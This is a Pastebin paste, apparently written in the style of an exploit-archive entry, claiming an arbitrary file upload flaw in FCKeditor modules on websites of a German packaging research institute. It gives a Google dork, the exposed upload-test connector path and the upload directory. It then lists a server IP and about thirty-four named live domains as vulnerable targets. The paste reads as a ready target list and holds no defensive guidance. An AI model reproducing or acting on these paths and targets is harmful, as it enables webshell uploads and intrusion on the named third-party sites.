API tools faq
paste
KingSkrupellos

Institut VerpackungsMarktForschung GMBH Modules File Upload

KingSkrupellos
Mar 28th, 2019
86
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.09 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : Institut VerpackungsMarktForschung GMBH Modules Arbitrary File Upload
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/03/2019
  7. # Vendor Homepage : ivm-childsafe.de
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Google Dorks : [PDF] inurl:/modules/fck/usr/
  12. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Reference Link : cxsecurity.com/issue/WLB-2019030233
  17.  
  18. ############################################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Institut VerpackungsMarktForschung GMBH FCKeditor Modules is prone to a vulnerability that lets attackers
  23.  
  24. upload arbitrary files because it fails to adequately sanitize user-supplied input.
  25.  
  26. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process.
  27.  
  28. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
  29.  
  30. Weaknesses in this category are related to the management of permissions, privileges, and other
  31.  
  32. security features that are used to perform access control.
  33.  
  34. ############################################################################################
  35.  
  36. # Arbitrary File Upload / Insert File Exploit :
  37. ***************************************
  38. /modules/fck/editor/filemanager/connectors/uploadtest.html
  39.  
  40. # Directory File Path :
  41. *********************
  42. /modules/fck/usr/[YOURFILENAME].txt .jpg .gif .png
  43.  
  44. ############################################################################################
  45.  
  46. # Example Vulnerable Sites :
  47. *************************
  48. [+] Vulnerable IP Address => 46.4.112.25 => There are 140 domains hosted on this server.
  49.  
  50. [+] heizungsfilter.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  51.  
  52. [+] ivm-childsafe.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  53.  
  54. [+] ivm-childsafe.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  55.  
  56. [+] child-safe.info/modules/fck/editor/filemanager/connectors/uploadtest.html
  57.  
  58. [+] child-safe.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  59.  
  60. [+] childproofpackaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  61.  
  62. [+] antonischki.net/modules/fck/editor/filemanager/connectors/uploadtest.html
  63.  
  64. [+] kindersicherheit.biz/modules/fck/editor/filemanager/connectors/uploadtest.html
  65.  
  66. [+] child-resistant-packages.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  67.  
  68. [+] child-resistant-packaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  69.  
  70. [+] child-resistant.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  71.  
  72. [+] child-resistant.net/modules/fck/editor/filemanager/connectors/uploadtest.html
  73.  
  74. [+] child-resistant.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  75.  
  76. [+] childproof.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  77.  
  78. [+] childresistant.net/modules/fck/editor/filemanager/connectors/uploadtest.html
  79.  
  80. [+] childresistant.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  81.  
  82. [+] childresistantpackages.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  83.  
  84. [+] childresistantpackaging.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  85.  
  86. [+] childresistantpackaging.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  87.  
  88. [+] childresistantpackaging.net/modules/fck/editor/filemanager/connectors/uploadtest.html
  89.  
  90. [+] childresistantpackaging.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  91.  
  92. [+] ivm-childsave.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  93.  
  94. [+] ivm-childsave.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  95.  
  96. [+] ivm-lab.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  97.  
  98. [+] ivm-lab.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  99.  
  100. [+] kindergesichert.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  101.  
  102. [+] kindergesicherte-verpackungen.com/modules/fck/editor/filemanager/connectors/uploadtest.html
  103.  
  104. [+] kindergesicherte-verpackungen.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  105.  
  106. [+] kindergesicherte-verpackungen.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  107.  
  108. [+] kindergesicherte.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  109.  
  110. [+] kindersicher.org/modules/fck/editor/filemanager/connectors/uploadtest.html
  111.  
  112. [+] kindersichere-verpackungen.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  113.  
  114. [+] kindersichere.de/modules/fck/editor/filemanager/connectors/uploadtest.html
  115.  
  116. ############################################################################################
  117.  
  118. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  119.  
  120. ############################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!